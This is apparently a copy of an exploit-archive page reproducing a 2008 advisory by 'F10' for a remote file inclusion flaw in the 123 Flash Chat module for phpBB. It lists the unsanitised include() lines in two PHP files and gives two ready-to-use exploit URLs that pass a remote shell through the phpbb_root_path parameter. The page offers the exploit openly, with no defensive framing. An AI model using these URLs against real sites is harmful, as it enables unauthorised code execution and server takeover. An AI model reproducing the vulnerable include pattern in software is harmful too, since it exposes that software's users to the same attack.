Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008030009

Below is a copy:

########################################################################
#################

Script          : 123 Flash Chat Module for phpBB                                       #

Discovered By   : F10                                                                   #

Contact         : by_f10 (at) hotmail (dot) com [email concealed]                                                    #

Site            : http://by-f10.com                                                     #

Greetz          : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 ,                      #

LupuS , m0sted , CyberGhost ... .                                     #

From            : Turkey                                                                #

Download        : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir                #

########################################################################
#################

The bugs are in :

path/123flashchat.php   include($phpbb_root_path . 'extension.inc');

path/123flashchat.php      include($phpbb_root_path . 'common.'.$phpEx);

path/phpbb_login_chat.php  include($phpbb_root_path . 'extension.inc');

path/phpbb_login_chat.php  include($phpbb_root_path . 'common.'.$phpEx);

exploitz :

www.site.com/path/123flashchat.php?phpbb_root_path=[shell]

www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]


Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.